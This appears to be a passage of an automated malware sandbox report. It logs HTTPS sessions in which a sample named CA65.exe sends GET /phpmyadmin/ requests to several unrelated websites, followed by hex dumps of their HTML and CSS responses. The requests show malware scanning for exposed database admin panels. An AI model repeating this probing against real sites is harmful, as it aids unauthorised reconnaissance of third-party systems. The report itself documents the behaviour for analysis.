6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:14:53 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:14:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:53 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:14:53 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:14:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:53 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:14:53 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:14:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:53 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	54417	64.68.191.221	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	364	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.adelaideclub.com/phpmyadmin/ X-Redirect-Reason: Wrong Portal Alias Requested Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:14:50 GMT Connection: close Content-Length: 157
2023-12-22 20:14:51 UTC	157	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 65 6c 61 69 64 65 63 6c 75 62 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.adelaideclub.com/phpmyadmin/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	54967	216.194.166.146	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	351	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:52 UTC	28	IN	Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
2023-12-22 20:14:52 UTC	43	IN	Data Raw: 32 35 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 25lang="en-US"><head><meta charset="
2023-12-22 20:14:52 UTC	14	IN	Data Raw: 39 0d 0a 55 54 46 2d 38 22 3e 0a 09 0d 0a Data Ascii: 9UTF-8">
2023-12-22 20:14:52 UTC	99	IN	Data Raw: 35 64 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 09 0d 0a Data Ascii: 5d<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />
2023-12-22 20:14:52 UTC	6	IN	Data Raw: 31 0d 0a 09 0d 0a Data Ascii: 1
2023-12-22 20:14:52 UTC	48	IN	Data Raw: 32 61 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 41 44 4d 20 57 6f 72 6b 73 3c 2f 74 69 74 6c 65 3e 0a 0d 0a Data Ascii: 2a<title>Page not found - ADM Works</title>
2023-12-22 20:14:53 UTC	63	IN	Data Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
2023-12-22 20:14:53 UTC	122	IN	Data Raw: 37 34 0d 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 31 2e 39 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 0d 0a Data Ascii: 74... This site is optimized with the Yoast SEO Premium plugin v11.9 - https://yoast.com/wordpress/plugins/seo/ -->
2023-12-22 20:14:53 UTC	64	IN	Data Raw: 31 64 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 0d 0a 31 31 0d 0a 6e 6f 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 2f 3e 0d 0a 31 0d 0a 0a 0d 0a Data Ascii: 1d<meta name="robots" content="11noindex,follow"/>1
2023-12-22 20:14:53 UTC	48	IN	Data Raw: 31 30 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 0d 0a 31 34 0d 0a 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 0d 0a Data Ascii: 10<meta property="14og:locale" content="

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	55265	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:52 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:52 UTC	833	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 Data Ascii: 10000<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt d
2023-12-22 20:14:52 UTC	14994	IN	Data Raw: 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 Data Ascii: \/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i
2023-12-22 20:14:52 UTC	16384	IN	Data Raw: 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a Data Ascii: n,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-siz
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 Data Ascii: -global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-c
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b Data Ascii: eft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;
2023-12-22 20:14:53 UTC	566	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2c 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 6f 6e 73 61 6c 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e Data Ascii: p-block-button__link, .wc-block-grid__product-onsale{color:rgba(0,0,0,0.58);border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce .woocommerce-message a.button:hover,.woocommerce #respon
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 62 35 63 64 0d 0a 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 20 2e 77 Data Ascii: b5cdlock-button__link:hover{color:#000000;border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button, .woocommerce button.button, .woocommerce .woocommerce-message a.button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .w
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 69 6e 67 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 5f 68 65 61 64 69 6e 67 7b 77 69 64 74 68 3a 34 30 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 63 6c 65 61 72 3a 72 69 67 68 74 3b 7d 7d 73 65 6c 65 63 74 2c 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: ing, .woocommerce-page.woocommerce-checkout form #order_review, .woocommerce-page.woocommerce-checkout form #order_review_heading{width:40%;float:right;margin-right:0;clear:right;}}select, .select2-container .select2-selection--single{background-image:url
